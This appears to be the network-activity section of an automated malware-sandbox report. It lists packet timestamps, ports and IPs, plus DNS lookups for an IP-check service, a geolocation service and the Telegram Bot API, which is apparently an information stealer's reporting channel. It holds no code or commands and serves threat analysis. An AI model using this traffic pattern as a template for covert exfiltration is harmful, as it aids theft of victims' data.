Sep 27, 2024 12:54:09.192490101 CEST	443	49801	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:09.195249081 CEST	49801	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:09.195266008 CEST	443	49801	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:09.195492983 CEST	49801	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:09.195498943 CEST	443	49801	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:10.449628115 CEST	443	49801	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:10.449713945 CEST	443	49801	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:10.449764013 CEST	49801	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:10.474232912 CEST	49801	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:10.524293900 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:10.524329901 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:10.524405003 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:10.532196045 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:10.532211065 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.144052982 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.190316916 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.205373049 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.205379963 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.210264921 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.210269928 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.411895037 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.411967993 CEST	443	49802	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.413049936 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.414315939 CEST	49802	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.418332100 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.418365955 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:11.418490887 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.419513941 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:11.419529915 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.078604937 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.081082106 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.081103086 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.081172943 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.081187010 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.345757961 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.345834970 CEST	443	49803	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.345920086 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.346466064 CEST	49803	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.349878073 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.349900961 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.349966049 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.350275040 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.350286961 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.967715025 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.969552040 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.969567060 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:12.969826937 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:12.969834089 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:21.537708998 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:21.540740967 CEST	443	49804	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:21.541678905 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:21.542609930 CEST	49804	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:21.545506954 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:21.545562029 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:21.545661926 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:21.545916080 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:21.545931101 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.358288050 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.361985922 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.362011909 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.362060070 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.362068892 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.741312027 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.741379976 CEST	443	49805	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.741436005 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.742194891 CEST	49805	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.745682001 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.745718956 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:22.745798111 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.746124983 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:22.746136904 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.545001030 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.550338984 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.550369978 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.558357000 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.558372974 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.891793966 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.891884089 CEST	443	49806	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.891935110 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.892616034 CEST	49806	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.896564007 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.896600962 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:23.896652937 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.896961927 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:23.896971941 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.637053013 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.639946938 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.639987946 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.640039921 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.640048981 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.961271048 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.964422941 CEST	443	49807	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.964915991 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.964915991 CEST	49807	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.967670918 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.967703104 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:24.968769073 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.968769073 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:24.968799114 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:25.712088108 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:25.716044903 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:25.716061115 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:25.716309071 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:25.716316938 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.020750046 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.020839930 CEST	443	49808	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.020930052 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.021423101 CEST	49808	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.024544954 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.024570942 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.024653912 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.024971962 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.024981976 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.695986986 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.701838970 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.701854944 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:26.701908112 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:26.701915979 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.126645088 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.130251884 CEST	443	49809	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.130455017 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.130758047 CEST	49809	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.138386011 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.138430119 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.139029026 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.139234066 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.139245033 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.928376913 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.930551052 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.930562019 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:27.930630922 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:27.930639029 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:28.271116972 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:28.271205902 CEST	443	49810	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:28.271267891 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:28.272145033 CEST	49810	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:28.276657104 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:28.276695967 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:28.276760101 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:28.277200937 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:28.277226925 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.035693884 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.041052103 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.041073084 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.041218996 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.041229010 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.417500973 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.417587042 CEST	443	49811	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.417681932 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.420589924 CEST	49811	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.420655012 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.420679092 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:29.420975924 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.421243906 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:29.421256065 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.120346069 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.122876883 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.122891903 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.123055935 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.123061895 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.527311087 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.529370070 CEST	443	49812	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.529438972 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.529723883 CEST	49812	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.541790009 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.541822910 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:30.541879892 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.542285919 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:30.542296886 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.153894901 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.155549049 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.155586004 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.155858994 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.155867100 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.479645014 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.479779005 CEST	443	49813	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.479878902 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.480555058 CEST	49813	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.492496014 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.492533922 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:31.493221998 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.493221998 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:31.493253946 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.132734060 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.134448051 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.134464979 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.134557009 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.134562016 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.428250074 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.428371906 CEST	443	49814	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.428416967 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.428776979 CEST	49814	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.432121992 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.432142019 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:32.432265043 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.432502985 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:32.432516098 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.055329084 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.056895971 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.056914091 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.057068110 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.057074070 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.346923113 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.347130060 CEST	443	49815	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.347182989 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.347522974 CEST	49815	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.349894047 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.349941015 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.350275040 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.350549936 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.350564003 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.988192081 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.989811897 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.989835978 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:33.989907980 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:33.989912987 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:34.462634087 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:34.462939024 CEST	443	49816	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:34.463001013 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:34.463350058 CEST	49816	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:34.466789961 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:34.466818094 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:34.466896057 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:34.467181921 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:34.467196941 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.175678015 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.177898884 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.177927017 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.178206921 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.178211927 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.541356087 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.541712999 CEST	443	49817	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.541837931 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.542355061 CEST	49817	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.544651031 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.544667959 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:35.544970989 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.545238018 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:35.545252085 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:36.179699898 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:36.181941032 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:36.181957006 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:36.181997061 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:36.182004929 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:40.052665949 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:40.052755117 CEST	443	49818	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:40.052860022 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:40.053582907 CEST	49818	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:40.059703112 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:40.059745073 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:40.061300993 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:40.061862946 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:40.061883926 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:52.107866049 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:52.111479044 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:52.111502886 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:52.112701893 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:52.112715960 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:54.520159960 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:54.520714998 CEST	443	49819	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:54.521661043 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:54.523739100 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:54.523787975 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:54:54.524537086 CEST	49819	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:54.525327921 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:54.525840998 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:54:54.525855064 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:11.994824886 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:11.997685909 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:11.997703075 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:11.997775078 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:11.997785091 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:45.695672989 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:45.696996927 CEST	443	49820	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:45.697510958 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:45.697964907 CEST	49820	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:45.700867891 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:45.700908899 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:55:45.700984001 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:45.701318026 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:55:45.701332092 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:02.833647966 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:02.835527897 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:02.835555077 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:02.835763931 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:02.835768938 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:03.823816061 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:03.824470997 CEST	443	49821	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:03.824541092 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:03.824865103 CEST	49821	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:03.827495098 CEST	49822	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:03.827522039 CEST	443	49822	149.154.167.220	192.168.2.7
Sep 27, 2024 12:56:03.827621937 CEST	49822	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:03.827845097 CEST	49822	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:56:03.827858925 CEST	443	49822	149.154.167.220	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 12:52:08.800407887 CEST	54362	53	192.168.2.7	1.1.1.1
Sep 27, 2024 12:52:08.807991028 CEST	53	54362	1.1.1.1	192.168.2.7
Sep 27, 2024 12:52:09.619435072 CEST	50969	53	192.168.2.7	1.1.1.1
Sep 27, 2024 12:52:09.627192020 CEST	53	50969	1.1.1.1	192.168.2.7
Sep 27, 2024 12:52:26.119177103 CEST	56292	53	192.168.2.7	1.1.1.1
Sep 27, 2024 12:52:26.202545881 CEST	53	56292	1.1.1.1	192.168.2.7
Sep 27, 2024 12:54:30.531884909 CEST	57318	53	192.168.2.7	1.1.1.1
Sep 27, 2024 12:54:30.541208029 CEST	53	57318	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 12:52:08.800407887 CEST	192.168.2.7	1.1.1.1	0x4aec	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:09.619435072 CEST	192.168.2.7	1.1.1.1	0x2417	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:26.119177103 CEST	192.168.2.7	1.1.1.1	0x55c9	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:54:30.531884909 CEST	192.168.2.7	1.1.1.1	0xefef	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:08.807991028 CEST	1.1.1.1	192.168.2.7	0x4aec	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:09.627192020 CEST	1.1.1.1	192.168.2.7	0x2417	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:09.627192020 CEST	1.1.1.1	192.168.2.7	0x2417	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 12:52:26.202545881 CEST	1.1.1.1	192.168.2.7	0x55c9	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
